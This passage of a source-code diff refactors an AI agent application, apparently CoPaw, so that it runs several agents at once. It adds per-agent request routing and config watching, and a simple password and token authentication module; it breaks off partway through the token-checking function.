WORKING_DIR + # Use provided workspace_dir or default to WORKING_DIR + target_dir = workspace_dir if workspace_dir is not None else WORKING_DIR + # Get md_files directory path with language subdirectory md_files_dir = Path(__file__).parent.parent / "md_files" / language @@ -40,13 +45,13 @@ def copy_md_files( logger.error("Default 'en' md files not found either") return [] - # Ensure working directory exists - WORKING_DIR.mkdir(parents=True, exist_ok=True) + # Ensure target directory exists + target_dir.mkdir(parents=True, exist_ok=True) - # Copy all .md files to working directory + # Copy all .md files to target directory copied_files: list[str] = [] for md_file in md_files_dir.glob("*.md"): - target_file = WORKING_DIR / md_file.name + target_file = target_dir / md_file.name if skip_existing and target_file.exists(): logger.debug("Skipped existing md file: %s", md_file.name) continue @@ -66,7 +71,7 @@ def copy_md_files( "Copied %d md file(s) [%s] to %s", len(copied_files), language, - WORKING_DIR, + target_dir, ) return copied_files diff --git a/src/copaw/app/_app.py b/src/copaw/app/_app.py index 8c908272b..86ea71c72 100644 --- a/src/copaw/app/_app.py +++ b/src/copaw/app/_app.py @@ -1,6 +1,5 @@ # -*- coding: utf-8 -*- # pylint: disable=redefined-outer-name,unused-argument -import asyncio import mimetypes import os import time @@ -13,27 +12,22 @@ from fastapi.responses import FileResponse from agentscope_runtime.engine.app import AgentApp -from .runner import AgentRunner -from ..config import ( # pylint: disable=no-name-in-module - load_config, - update_last_dispatch, - ConfigWatcher, -) -from ..config.utils import get_jobs_path, get_chats_path, get_config_path +from ..config import load_config # pylint: disable=no-name-in-module +from ..config.utils import get_config_path from ..constant import DOCS_ENABLED, LOG_LEVEL_ENV, CORS_ORIGINS, WORKING_DIR from ..__version__ import __version__ from ..utils.logging import setup_logger, add_copaw_file_handler -from .channels import ChannelManager # pylint: disable=no-name-in-module -from .channels.utils import make_process_from_runner -from .mcp import MCPClientManager, MCPConfigWatcher # MCP hot-reload support -from .runner.repo.json_repo import JsonChatRepository -from .crons.repo.json_repo import JsonJobRepository -from .crons.manager import CronManager -from .runner.manager import ChatManager -from .routers import router as api_router +from .auth import AuthMiddleware +from .routers import router as api_router, create_agent_scoped_router +from .routers.agent_scoped import AgentContextMiddleware from .routers.voice import voice_router from ..envs import load_envs_into_environ from ..providers.provider_manager import ProviderManager +from .multi_agent_manager import MultiAgentManager +from .migration import ( + migrate_legacy_workspace_to_default_agent, + ensure_default_agent_exists, +) # Apply log level on load so reload child process gets same level as CLI. logger = setup_logger(os.environ.get(LOG_LEVEL_ENV, "info")) @@ -50,7 +44,98 @@ # so they are available before the lifespan starts. load_envs_into_environ() -runner = AgentRunner() + +# Dynamic runner that selects the correct workspace runner based on request +class DynamicMultiAgentRunner: + """Runner wrapper that dynamically routes to the correct workspace runner. + + This allows AgentApp to work with multiple agents by inspecting + the X-Agent-Id header on each request. + """ + + def __init__(self): + self.framework_type = "agentscope" + self._multi_agent_manager = None + + def set_multi_agent_manager(self, manager): + """Set the MultiAgentManager instance after initialization.""" + self._multi_agent_manager = manager + + async def _get_workspace_runner(self, request): + """Get the correct workspace runner based on request.""" + from .agent_context import get_current_agent_id + + # Get agent_id from context (set by middleware or header) + agent_id = get_current_agent_id() + + logger.debug(f"_get_workspace_runner: agent_id={agent_id}") + + # Get the correct workspace runner + if not self._multi_agent_manager: + raise RuntimeError("MultiAgentManager not initialized") + + try: + workspace = await self._multi_agent_manager.get_agent(agent_id) + logger.debug( + f"Got workspace: {workspace.agent_id}, " + f"runner: {workspace.runner}", + ) + return workspace.runner + except ValueError as e: + logger.error(f"Agent not found: {e}") + raise + except Exception as e: + logger.error( + f"Error getting workspace runner: {e}", + exc_info=True, + ) + raise + + async def stream_query(self, request, *args, **kwargs): + """Dynamically route to the correct workspace runner.""" + logger.debug("DynamicMultiAgentRunner.stream_query called") + try: + runner = await self._get_workspace_runner(request) + logger.debug(f"Got runner: {runner}, type: {type(runner)}") + # Delegate to the actual runner's stream_query generator + count = 0 + async for item in runner.stream_query(request, *args, **kwargs): + count += 1 + logger.debug(f"Yielding item #{count}: {type(item)}") + yield item + logger.debug(f"stream_query completed, yielded {count} items") + except Exception as e: + logger.error( + f"Error in stream_query: {e}", + exc_info=True, + ) + # Yield error message to client + yield { + "error": str(e), + "type": "error", + } + + async def query_handler(self, request, *args, **kwargs): + """Dynamically route to the correct workspace runner.""" + runner = await self._get_workspace_runner(request) + # Delegate to the actual runner's query_handler generator + async for item in runner.query_handler(request, *args, **kwargs): + yield item + + # Async context manager support for AgentApp lifecycle + async def __aenter__(self): + """ + No-op context manager entry (workspaces manage their own runners). + """ + return self + + async def __aexit__(self, exc_type, exc_val, exc_tb): + """No-op context manager exit (workspaces manage their own runners).""" + return None + + +# Use dynamic runner for AgentApp +runner = DynamicMultiAgentRunner() agent_app = AgentApp( app_name="Friday", @@ -65,343 +150,50 @@ async def lifespan( ): # pylint: disable=too-many-statements,too-many-branches startup_start_time = time.time() add_copaw_file_handler(WORKING_DIR / "copaw.log") - await runner.start() - # --- MCP client manager init (independent module, hot-reloadable) --- - config = load_config() - mcp_manager = MCPClientManager() - if hasattr(config, "mcp"): - try: - await mcp_manager.init_from_config(config.mcp) - logger.debug("MCP client manager initialized") - except BaseException as e: - if isinstance(e, (KeyboardInterrupt, SystemExit)): - raise - logger.exception("Failed to initialize MCP manager") - runner.set_mcp_manager(mcp_manager) - - # --- channel connector init/start (from config.json) --- - channel_manager = ChannelManager.from_config( - process=make_process_from_runner(runner), - config=config, - on_last_dispatch=update_last_dispatch, - ) - await channel_manager.start_all() - - # --- cron init/start --- - repo = JsonJobRepository(get_jobs_path()) - cron_manager = CronManager( - repo=repo, - runner=runner, - channel_manager=channel_manager, - timezone="UTC", - ) - await cron_manager.start() - - # --- chat manager init and connect to runner.session --- - chat_repo = JsonChatRepository(get_chats_path()) - chat_manager = ChatManager( - repo=chat_repo, - ) - - runner.set_chat_manager(chat_manager) - - # --- config file watcher (channels + heartbeat hot-reload on change) --- - config_watcher = ConfigWatcher( - channel_manager=channel_manager, - cron_manager=cron_manager, - ) - await config_watcher.start() - - # --- MCP config watcher (auto-reload MCP clients on change) --- - mcp_watcher = None - if hasattr(config, "mcp"): - try: - mcp_watcher = MCPConfigWatcher( - mcp_manager=mcp_manager, - config_loader=load_config, - config_path=get_config_path(), - ) - await mcp_watcher.start() - logger.debug("MCP config watcher started") - except BaseException as e: - if isinstance(e, (KeyboardInterrupt, SystemExit)): - raise - logger.exception("Failed to start MCP watcher") + # --- Multi-agent migration and initialization --- + logger.info("Checking for legacy config migration...") + migrate_legacy_workspace_to_default_agent() + ensure_default_agent_exists() - # Inject channel_manager into approval service so it can - # proactively push approval messages to channels like DingTalk. - from .approvals import get_approval_service + # --- Multi-agent manager initialization --- + logger.info("Initializing MultiAgentManager...") + multi_agent_manager = MultiAgentManager() - get_approval_service().set_channel_manager(channel_manager) + # Start all configured agents (handled by manager) + await multi_agent_manager.start_all_configured_agents() # --- Model provider manager (non-reloadable, in-memory) --- provider_manager = ProviderManager.get_instance() - # expose to endpoints - app.state.runner = runner - app.state.channel_manager = channel_manager - app.state.cron_manager = cron_manager - app.state.chat_manager = chat_manager - app.state.config_watcher = config_watcher - app.state.mcp_manager = mcp_manager - app.state.mcp_watcher = mcp_watcher - app.state.provider_manager = provider_manager + # Expose to endpoints - multi-agent manager + app.state.multi_agent_manager = multi_agent_manager - _restart_task: asyncio.Task | None = None + # Connect DynamicMultiAgentRunner to MultiAgentManager + if isinstance(runner, DynamicMultiAgentRunner): + runner.set_multi_agent_manager(multi_agent_manager) - async def _restart_services() -> None: - """Stop all managers, then rebuild from config (no exit). + # Helper function to get agent instance by ID (async) + async def _get_agent_by_id(agent_id: str = None): + """Get agent instance by ID, or active agent if not specified.""" + if agent_id is None: + config = load_config(get_config_path()) + agent_id = config.agents.active_agent or "default" + return await multi_agent_manager.get_agent(agent_id) - Single-flight: only one restart runs at a time. Concurrent or - duplicate callers wait for the in-progress restart and return - successfully. Uses asyncio.shield() so that when the caller - (e.g. channel request) is cancelled, the restart task keeps - running and does not propagate cancellation into deep task - trees (avoids RecursionError on cancel). - """ - # pylint: disable=too-many-statements - nonlocal _restart_task - # Caller task (in _local_tasks) must not be cancelled so it can - # yield the final "Restart completed" message. - restart_requester_task = asyncio.current_task() + app.state.get_agent_by_id = _get_agent_by_id - async def _run_then_clear() -> None: - try: - await _do_restart_services( - restart_requester_task=restart_requester_task, - ) - finally: - nonlocal _restart_task - _restart_task = None - - if _restart_task is not None and not _restart_task.done(): - logger.info( - "_restart_services: waiting for in-progress restart to finish", - ) - await asyncio.shield(_restart_task) - return - if _restart_task is not None and _restart_task.done(): - _restart_task = None - logger.info("_restart_services: starting restart") - _restart_task = asyncio.create_task(_run_then_clear()) - await asyncio.shield(_restart_task) - - async def _teardown_new_stack( - mcp_watcher=None, - config_watcher=None, - cron_mgr=None, - ch_mgr=None, - mcp_mgr=None, - ) -> None: - """Stop new stack in reverse start order (for rollback on failure).""" - if mcp_watcher is not None: - try: - await mcp_watcher.stop() - except Exception: - logger.debug( - "rollback: mcp_watcher.stop failed", - exc_info=True, - ) - if config_watcher is not None: - try: - await config_watcher.stop() - except Exception: - logger.debug( - "rollback: config_watcher.stop failed", - exc_info=True, - ) - if cron_mgr is not None: - try: - await cron_mgr.stop() - except Exception: - logger.debug( - "rollback: cron_manager.stop failed", - exc_info=True, - ) - if ch_mgr is not None: - try: - await ch_mgr.stop_all() - except Exception: - logger.debug( - "rollback: channel_manager.stop_all failed", - exc_info=True, - ) - if mcp_mgr is not None: - try: - await mcp_mgr.close_all() - except Exception: - logger.debug( - "rollback: mcp_manager.close_all failed", - exc_info=True, - ) - - async def _do_restart_services( - restart_requester_task: asyncio.Task | None = None, - ) -> None: - """Cancel in-flight agent requests first (so they can send error to - channel), then stop old stack, then start new stack and swap. - """ - # pylint: disable=too-many-statements - try: - config = load_config(get_config_path()) - except Exception: - logger.exception("restart_services: load_config failed") - return - - # 1) Cancel in-flight agent requests. Do not wait for them so the - # console restart task never blocks (avoid deadlock when cancelled - # task is slow to exit). - local_tasks = getattr(agent_app, "_local_tasks", None) - if local_tasks: - to_cancel = [ - t - for t in list(local_tasks.values()) - if t is not restart_requester_task and not t.done() - ] - for t in to_cancel: - t.cancel() - if to_cancel: - logger.info( - "restart: cancelled %s in-flight task(s), not waiting", - len(to_cancel), - ) - - # 2) Stop old stack - cfg_w = app.state.config_watcher - mcp_w = getattr(app.state, "mcp_watcher", None) - cron_mgr = app.state.cron_manager - ch_mgr = app.state.channel_manager - mcp_mgr = app.state.mcp_manager - try: - await cfg_w.stop() - except Exception: - logger.exception( - "restart_services: old config_watcher.stop failed", - ) - if mcp_w is not None: - try: - await mcp_w.stop() - except Exception: - logger.exception( - "restart_services: old mcp_watcher.stop failed", - ) - try: - await cron_mgr.stop() - except Exception: - logger.exception( - "restart_services: old cron_manager.stop failed", - ) - try: - await ch_mgr.stop_all() - except Exception: - logger.exception( - "restart_services: old channel_manager.stop_all failed", - ) - if mcp_mgr is not None: - try: - await mcp_mgr.close_all() - except Exception: - logger.exception( - "restart_services: old mcp_manager.close_all failed", - ) - - # 3) Build and start new stack - new_mcp_manager = MCPClientManager() - if hasattr(config, "mcp"): - try: - await new_mcp_manager.init_from_config(config.mcp) - except Exception: - logger.exception( - "restart_services: mcp init_from_config failed", - ) - return - - new_channel_manager = ChannelManager.from_config( - process=make_process_from_runner(runner), - config=config, - on_last_dispatch=update_last_dispatch, - ) - try: - await new_channel_manager.start_all() - except Exception: - logger.exception( - "restart_services: channel_manager.start_all failed", - ) - await _teardown_new_stack(mcp_mgr=new_mcp_manager) - return - - job_repo = JsonJobRepository(get_jobs_path()) - new_cron_manager = CronManager( - repo=job_repo, - runner=runner, - channel_manager=new_channel_manager, - timezone="UTC", - ) - try: - await new_cron_manager.start() - except Exception: - logger.exception( - "restart_services: cron_manager.start failed", - ) - await _teardown_new_stack( - ch_mgr=new_channel_manager, - mcp_mgr=new_mcp_manager, - ) - return + # Global managers (shared across all agents) + app.state.provider_manager = provider_manager - new_config_watcher = ConfigWatcher( - channel_manager=new_channel_manager, - cron_manager=new_cron_manager, - ) - try: - await new_config_watcher.start() - except Exception: - logger.exception( - "restart_services: config_watcher.start failed", - ) - await _teardown_new_stack( - cron_mgr=new_cron_manager, - ch_mgr=new_channel_manager, - mcp_mgr=new_mcp_manager, - ) - return + # Setup approval service with default agent's channel_manager + default_agent = await multi_agent_manager.get_agent("default") + if default_agent.channel_manager: + from .approvals import get_approval_service - new_mcp_watcher = None - if hasattr(config, "mcp"): - try: - new_mcp_watcher = MCPConfigWatcher( - mcp_manager=new_mcp_manager, - config_loader=load_config, - config_path=get_config_path(), - ) - await new_mcp_watcher.start() - except Exception: - logger.exception( - "restart_services: mcp_watcher.start failed", - ) - await _teardown_new_stack( - config_watcher=new_config_watcher, - cron_mgr=new_cron_manager, - ch_mgr=new_channel_manager, - mcp_mgr=new_mcp_manager, - ) - return - - if hasattr(config, "mcp"): - runner.set_mcp_manager(new_mcp_manager) - app.state.mcp_manager = new_mcp_manager - app.state.mcp_watcher = new_mcp_watcher - else: - runner.set_mcp_manager(None) - app.state.mcp_manager = None - app.state.mcp_watcher = None - app.state.channel_manager = new_channel_manager - app.state.cron_manager = new_cron_manager - app.state.config_watcher = new_config_watcher - logger.info("Daemon restart (in-process) completed: managers rebuilt") - - setattr(runner, "_restart_callback", _restart_services) + get_approval_service().set_channel_manager( + default_agent.channel_manager, + ) startup_elapsed = time.time() - startup_start_time logger.debug( @@ -411,39 +203,16 @@ async def _do_restart_services( try: yield finally: - # Stop current app.state refs (post-restart instances if any) - cfg_w = getattr(app.state, "config_watcher", None) - mcp_w = getattr(app.state, "mcp_watcher", None) - cron_mgr = getattr(app.state, "cron_manager", None) - ch_mgr = getattr(app.state, "channel_manager", None) - mcp_mgr = getattr(app.state, "mcp_manager", None) - # stop order: watchers -> cron -> channels -> mcp -> runner - if cfg_w is not None: - try: - await cfg_w.stop() - except Exception: - pass - if mcp_w is not None: - try: - await mcp_w.stop() - except Exception: - pass - if cron_mgr is not None: - try: - await cron_mgr.stop() - except Exception: - pass - if ch_mgr is not None: + # Stop multi-agent manager (stops all agents and their components) + multi_agent_mgr = getattr(app.state, "multi_agent_manager", None) + if multi_agent_mgr is not None: + logger.info("Stopping MultiAgentManager...") try: - await ch_mgr.stop_all() - except Exception: - pass - if mcp_mgr is not None: - try: - await mcp_mgr.close_all() - except Exception: - pass - await runner.stop() + await multi_agent_mgr.stop_all() + except Exception as e: + logger.error(f"Error stopping MultiAgentManager: {e}") + + logger.info("Application shutdown complete") app = FastAPI( @@ -453,6 +222,11 @@ async def _do_restart_services( openapi_url="/openapi.json" if DOCS_ENABLED else None, ) +# Add agent context middleware for agent-scoped routes +app.add_middleware(AgentContextMiddleware) + +app.add_middleware(AuthMiddleware) + # Apply CORS middleware if CORS_ORIGINS is set if CORS_ORIGINS: origins = [o.strip() for o in CORS_ORIGINS.split(",") if o.strip()] @@ -504,7 +278,8 @@ def read_root(): "CoPaw Web Console is not available. " "If you installed CoPaw from source code, please run " "`npm ci && npm run build` in CoPaw's `console/` " - "directory, and restart CoPaw to enable the web console." + "directory, and restart CoPaw to enable the " + "web console." ), } @@ -517,6 +292,11 @@ def get_version(): app.include_router(api_router, prefix="/api") +# Agent-scoped router: /api/agents/{agentId}/chats, etc. +agent_scoped_router = create_agent_scoped_router() +app.include_router(agent_scoped_router, prefix="/api") + + app.include_router( agent_app.router, prefix="/api/agent", @@ -532,6 +312,12 @@ def get_version(): if os.path.isdir(_CONSOLE_STATIC_DIR): _console_path = Path(_CONSOLE_STATIC_DIR) + def _serve_console_index(): + if _CONSOLE_INDEX and _CONSOLE_INDEX.exists(): + return FileResponse(_CONSOLE_INDEX) + + raise HTTPException(status_code=404, detail="Not Found") + @app.get("/logo.png") def _console_logo(): f = _console_path / "logo.png" @@ -556,9 +342,14 @@ def _console_icon(): name="assets", ) + @app.get("/console") + @app.get("/console/") + @app.get("/console/{full_path:path}") + def _console_spa_alias(full_path: str = ""): + _ = full_path + return _serve_console_index() + @app.get("/{full_path:path}") def _console_spa(full_path: str): - if _CONSOLE_INDEX and _CONSOLE_INDEX.exists(): - return FileResponse(_CONSOLE_INDEX) - - raise HTTPException(status_code=404, detail="Not Found") + _ = full_path + return _serve_console_index() diff --git a/src/copaw/config/watcher.py b/src/copaw/app/agent_config_watcher.py similarity index 54% rename from src/copaw/config/watcher.py rename to src/copaw/app/agent_config_watcher.py index 8c5dded31..8ccb87463 100644 --- a/src/copaw/config/watcher.py +++ b/src/copaw/app/agent_config_watcher.py @@ -1,16 +1,23 @@ # -*- coding: utf-8 -*- -"""Watch config.json for changes and auto-reload channels and heartbeat.""" +"""Watch agent.json for changes and auto-reload agent components. + +This watcher monitors an agent's workspace/agent.json file for changes +and automatically reloads channels, heartbeat, and other configurations +without requiring manual restart. +""" from __future__ import annotations import asyncio import logging from pathlib import Path -from typing import Any, Optional +from typing import Any, Optional, TYPE_CHECKING + +from ..config.config import load_agent_config +from ..config.utils import get_available_channels -from .utils import load_config, get_config_path, get_available_channels -from .config import ChannelConfig, HeartbeatConfig -from ..app.channels import ChannelManager # pylint: disable=no-name-in-module +if TYPE_CHECKING: + from ..config.config import ChannelConfig, HeartbeatConfig logger = logging.getLogger(__name__) @@ -25,27 +32,43 @@ def _heartbeat_hash(hb: Optional[HeartbeatConfig]) -> int: return hash(str(hb.model_dump(mode="json"))) -class ConfigWatcher: - """Poll config.json mtime; reload only changed channels automatically.""" +class AgentConfigWatcher: + """Poll agent.json mtime and reload changed configs automatically. + + This watcher is agent-scoped and monitors a specific agent's + workspace/agent.json file for configuration changes. + """ def __init__( self, - channel_manager: ChannelManager, - poll_interval: float = DEFAULT_POLL_INTERVAL, - config_path: Optional[Path] = None, + agent_id: str, + workspace_dir: Path, + channel_manager: Any, cron_manager: Any = None, + poll_interval: float = DEFAULT_POLL_INTERVAL, ): + """Initialize agent config watcher. + + Args: + agent_id: Agent ID to monitor + workspace_dir: Path to agent's workspace directory + channel_manager: ChannelManager instance for this agent + cron_manager: CronManager instance for this agent (optional) + poll_interval: How often to check for changes (seconds) + """ + self._agent_id = agent_id + self._workspace_dir = workspace_dir + self._config_path = workspace_dir / "agent.json" self._channel_manager = channel_manager - self._poll_interval = poll_interval - self._config_path = config_path or get_config_path() self._cron_manager = cron_manager + self._poll_interval = poll_interval self._task: Optional[asyncio.Task] = None - # Snapshot of the last known channel config (for diffing) + # Snapshot of the last known config (for diffing) self._last_channels: Optional[ChannelConfig] = None self._last_channels_hash: Optional[int] = None self._last_heartbeat_hash: Optional[int] = None - # mtime of config.json at last check + # mtime of agent.json at last check self._last_mtime: float = 0.0 async def start(self) -> None: @@ -53,15 +76,15 @@ async def start(self) -> None: self._snapshot() self._task = asyncio.create_task( self._poll_loop(), - name="config_watcher", + name=f"agent_config_watcher_{self._agent_id}", ) logger.info( - "ConfigWatcher started (poll=%.1fs, path=%s)", - self._poll_interval, - self._config_path, + f"AgentConfigWatcher started for agent {self._agent_id} " + f"(poll={self._poll_interval}s, path={self._config_path})", ) async def stop(self) -> None: + """Stop the polling task.""" if self._task: self._task.cancel() try: @@ -69,28 +92,40 @@ async def stop(self) -> None: except asyncio.CancelledError: pass self._task = None - logger.info("ConfigWatcher stopped") + logger.info(f"AgentConfigWatcher stopped for agent {self._agent_id}") # ------------------------------------------------------------------ + # Internal methods + # ------------------------------------------------------------------ def _snapshot(self) -> None: - """Load current config; record mtime, channels hash, heartbeat hash.""" + """Load current agent config; record mtime and hashes.""" try: self._last_mtime = self._config_path.stat().st_mtime except FileNotFoundError: self._last_mtime = 0.0 + try: - config = load_config(self._config_path) - self._last_channels = config.channels.model_copy(deep=True) - self._last_channels_hash = self._channels_hash(config.channels) - hb = getattr( - config.agents.defaults, - "heartbeat", - None, + agent_config = load_agent_config(self._agent_id) + if agent_config.channels: + self._last_channels = agent_config.channels.model_copy( + deep=True, + ) + self._last_channels_hash = self._channels_hash( + agent_config.channels, + ) + else: + self._last_channels = None + self._last_channels_hash = None + + self._last_heartbeat_hash = _heartbeat_hash( + agent_config.heartbeat, ) - self._last_heartbeat_hash = _heartbeat_hash(hb) except Exception: - logger.exception("ConfigWatcher: failed to load initial config") + logger.exception( + f"AgentConfigWatcher: failed to load initial config " + f"for agent {self._agent_id}", + ) self._last_channels = None self._last_channels_hash = None self._last_heartbeat_hash = None @@ -123,26 +158,33 @@ async def _reload_one_channel( old_channel = await self._channel_manager.get_channel(name) if old_channel is None: logger.warning( - "ConfigWatcher: channel '%s' not found, skip", - name, + f"AgentConfigWatcher ({self._agent_id}): " + f"channel '{name}' not found, skip", ) return new_channel = old_channel.clone(new_ch) await self._channel_manager.replace_channel(new_channel) - logger.info("ConfigWatcher: channel '%s' reloaded", name) + logger.info( + f"AgentConfigWatcher ({self._agent_id}): " + f"channel '{name}' reloaded", + ) except Exception: logger.exception( - "ConfigWatcher: failed to reload channel '%s'", - name, + f"AgentConfigWatcher ({self._agent_id}): " + f"failed to reload channel '{name}'", ) setattr(new_channels, name, old_ch if old_ch else new_ch) - async def _apply_channel_changes(self, loaded_config: Any) -> None: + async def _apply_channel_changes(self, agent_config: Any) -> None: """Diff channels and reload changed ones; update snapshot.""" - new_hash = self._channels_hash(loaded_config.channels) + if not agent_config.channels: + return + + new_hash = self._channels_hash(agent_config.channels) if new_hash == self._last_channels_hash: return - new_channels = loaded_config.channels + + new_channels = agent_config.channels old_channels = self._last_channels extra_new = getattr(new_channels, "__pydantic_extra__", None) or {} extra_old = ( @@ -150,6 +192,7 @@ async def _apply_channel_changes(self, loaded_config: Any) -> None: if old_channels else {} ) + for name in get_available_channels(): new_ch = getattr(new_channels, name, None) or extra_new.get(name) old_ch = ( @@ -164,17 +207,17 @@ async def _apply_channel_changes(self, loaded_config: Any) -> None: if new_dump is not None and new_dump == old_dump: continue logger.info( - "ConfigWatcher: channel '%s' config changed, reloading", - name, + f"AgentConfigWatcher ({self._agent_id}): " + f"channel '{name}' config changed, reloading", ) await self._reload_one_channel(name, new_ch, new_channels, old_ch) + self._last_channels = new_channels.model_copy(deep=True) self._last_channels_hash = self._channels_hash(new_channels) - async def _apply_heartbeat_change(self, loaded_config: Any) -> None: + async def _apply_heartbeat_change(self, agent_config: Any) -> None: """Update heartbeat hash and reschedule if changed.""" - hb = getattr(loaded_config.agents.defaults, "heartbeat", None) - new_hb_hash = _heartbeat_hash(hb) + new_hb_hash = _heartbeat_hash(agent_config.heartbeat) if ( self._cron_manager is not None and new_hb_hash != self._last_heartbeat_hash @@ -182,34 +225,53 @@ async def _apply_heartbeat_change(self, loaded_config: Any) -> None: self._last_heartbeat_hash = new_hb_hash try: await self._cron_manager.reschedule_heartbeat() - logger.info("ConfigWatcher: heartbeat rescheduled") + logger.info( + f"AgentConfigWatcher ({self._agent_id}): " + f"heartbeat rescheduled", + ) except Exception: logger.exception( - "ConfigWatcher: failed to reschedule heartbeat", + f"AgentConfigWatcher ({self._agent_id}): " + f"failed to reschedule heartbeat", ) else: self._last_heartbeat_hash = new_hb_hash async def _poll_loop(self) -> None: + """Main polling loop.""" while True: try: await asyncio.sleep(self._poll_interval) await self._check() except Exception: - logger.exception("ConfigWatcher: poll iteration failed") + logger.exception( + f"AgentConfigWatcher ({self._agent_id}): " + f"poll iteration failed", + ) async def _check(self) -> None: + """Check for config changes and reload if needed.""" try: mtime = self._config_path.stat().st_mtime except FileNotFoundError: return + if mtime == self._last_mtime: return + self._last_mtime = mtime + try: - loaded = load_config(self._config_path) + agent_config = load_agent_config(self._agent_id) except Exception: - logger.exception("ConfigWatcher: failed to parse config.json") + logger.exception( + f"AgentConfigWatcher ({self._agent_id}): " + f"failed to parse agent.json", + ) return - await self._apply_channel_changes(loaded) - await self._apply_heartbeat_change(loaded) + + # Apply changes + if self._channel_manager: + await self._apply_channel_changes(agent_config) + if self._cron_manager: + await self._apply_heartbeat_change(agent_config) diff --git a/src/copaw/app/agent_context.py b/src/copaw/app/agent_context.py new file mode 100644 index 000000000..d263ee5bf --- /dev/null +++ b/src/copaw/app/agent_context.py @@ -0,0 +1,117 @@ +# -*- coding: utf-8 -*- +"""Agent context utilities for multi-agent support. + +Provides utilities to get the correct agent instance for each request. +""" +from contextvars import ContextVar +from typing import Optional, TYPE_CHECKING +from fastapi import Request +from .multi_agent_manager import MultiAgentManager +from ..config.utils import load_config + +if TYPE_CHECKING: + from .workspace import Workspace + +# Context variable to store current agent ID across async calls +_current_agent_id: ContextVar[Optional[str]] = ContextVar( + "current_agent_id", + default=None, +) + + +async def get_agent_for_request( + request: Request, + agent_id: Optional[str] = None, +) -> "Workspace": + """Get agent workspace for current request. + + Priority: + 1. agent_id parameter (explicit override) + 2. request.state.agent_id (from agent-scoped router) + 3. X-Agent-Id header (from frontend) + 4. Active agent from config + + Args: + request: FastAPI request object + agent_id: Agent ID override (highest priority) + + Returns: + Workspace for the specified or active agent + + Raises: + HTTPException: If agent not found + """ + from fastapi import HTTPException + + # Determine which agent to use + target_agent_id = agent_id + + # Check request.state.agent_id (set by agent-scoped router) + if not target_agent_id and hasattr(request.state, "agent_id"): + target_agent_id = request.state.agent_id + + # Check X-Agent-Id header + if not target_agent_id: + target_agent_id = request.headers.get("X-Agent-Id") + + if not target_agent_id: + # Fallback to active agent from config + config = load_config() + target_agent_id = config.agents.active_agent or "default" + + # Get MultiAgentManager + if not hasattr(request.app.state, "multi_agent_manager"): + raise HTTPException( + status_code=500, + detail="MultiAgentManager not initialized", + ) + + manager: MultiAgentManager = request.app.state.multi_agent_manager + + try: + workspace = await manager.get_agent(target_agent_id) + if not workspace: + raise HTTPException( + status_code=404, + detail=f"Agent '{target_agent_id}' not found", + ) + return workspace + except Exception as e: + raise HTTPException( + status_code=500, + detail=f"Failed to get agent: {str(e)}", + ) from e + + +def get_active_agent_id() -> str: + """Get current active agent ID from config. + + Returns: + Active agent ID, defaults to "default" + """ + try: + config = load_config() + return config.agents.active_agent or "default" + except Exception: + return "default" + + +def set_current_agent_id(agent_id: str) -> None: + """Set current agent ID in context. + + Args: + agent_id: Agent ID to set + """ + _current_agent_id.set(agent_id) + + +def get_current_agent_id() -> str: + """Get current agent ID from context or config fallback. + + Returns: + Current agent ID, defaults to active agent or "default" + """ + agent_id = _current_agent_id.get() + if agent_id: + return agent_id + return get_active_agent_id() diff --git a/src/copaw/app/auth.py b/src/copaw/app/auth.py new file mode 100644 index 000000000..b2b05bdd2 --- /dev/null +++ b/src/copaw/app/auth.py @@ -0,0 +1,335 @@ +# -*- coding: utf-8 -*- +"""Authentication module: password hashing, JWT tokens, and FastAPI middleware. + +Login is disabled by default and only enabled when the environment +variable ``COPAW_AUTH_ENABLED`` is set to a truthy value (``true``, +``1``, ``yes``). Credentials are created through a web-based +registration flow rather than environment variables, so that agents +running inside the process cannot read plaintext passwords. + +Single-user design: only one account can be registered. If the user +forgets their password, delete ``auth.json`` from ``SECRET_DIR`` and +restart the service to re-register. + +Uses only Python stdlib (hashlib, hmac, secrets) to avoid adding new +dependencies. The password is stored as a salted SHA-256 hash in +``auth.json`` under ``SECRET_DIR``. +""" +from __future__ import annotations + +import hashlib +import hmac +import json +import logging +import os +import secrets +import time +from typing import Optional + +from fastapi import Request, Response +from starlette.middleware.base import BaseHTTPMiddleware + +from ..constant import SECRET_DIR + +logger = logging.getLogger(__name__) + +AUTH_FILE = SECRET_DIR / "auth.json" + +# Token validity: 7 days +TOKEN_EXPIRY_SECONDS = 7 * 24 * 3600 + +# Paths that do NOT require authentication +_PUBLIC_PATHS: frozenset[str] = frozenset( + { + "/api/auth/login", + "/api/auth/status", + "/api/auth/register", + "/api/version", + }, +) + +# Prefixes that do NOT require authentication (static assets) +_PUBLIC_PREFIXES: tuple[str, ...] = ( + "/assets/", + "/logo.png", + "/copaw-symbol.svg", +) + + +# --------------------------------------------------------------------------- +# Helpers (reuse SECRET_DIR patterns from envs/store.py) +# --------------------------------------------------------------------------- + + +def _chmod_best_effort(path, mode: int) -> None: + try: + os.chmod(path, mode) + except OSError: + pass + + +def _prepare_secret_parent(path) -> None: + path.parent.mkdir(parents=True, exist_ok=True) + _chmod_best_effort(path.parent, 0o700) + + +# --------------------------------------------------------------------------- +# Password hashing (salted SHA-256, no external deps) +# --------------------------------------------------------------------------- + + +def _hash_password( + password: str, + salt: Optional[str] = None, +) -> tuple[str, str]: + """Hash *password* with *salt*. Returns ``(hash_hex, salt_hex)``.""" + if salt is None: + salt = secrets.token_hex(16) + h = hashlib.sha256((salt + password).encode("utf-8")).hexdigest() + return h, salt + + +def verify_password(password: str, stored_hash: str, salt: str) -> bool: + """Verify *password* against a stored hash.""" + h, _ = _hash_password(password, salt) + return hmac.compare_digest(h, stored_hash) + + +# --------------------------------------------------------------------------- +# Token generation / verification (HMAC-SHA256, no PyJWT needed) +# --------------------------------------------------------------------------- + + +def _get_jwt_secret() -> str: + """Return the signing secret, creating one if absent.""" + data = _load_auth_data() + secret = data.get("jwt_secret", "") + if not secret: + secret = secrets.token_hex(32) + data["jwt_secret"] = secret + _save_auth_data(data) + return secret + + +def create_token(username: str) -> str: + """Create an HMAC-signed token: ``base64(payload).signature``.""" + import base64 + + secret = _get_jwt_secret() + payload = json.dumps( + { + "sub": username, + "exp": int(time.time()) + TOKEN_EXPIRY_SECONDS, + "iat": int(time.time()), + }, + ) + payload_b64 = base64.urlsafe_b64encode(payload.encode()).decode() + sig = hmac.new( + secret.encode(), + payload_b64.encode(), + hashlib.sha256, + ).hexdigest() + return f"{payload_b64}.{sig}" + + +def verify_token(token: str) -> Optional[str]: + """Verify *token*, return username if valid, ``None`` otherwise.""" + import base64 + + try: + parts = token.split(".", 1) + if len(parts) != 2: + return None + payload_b64, sig = parts + secret = _get_jwt_secret() 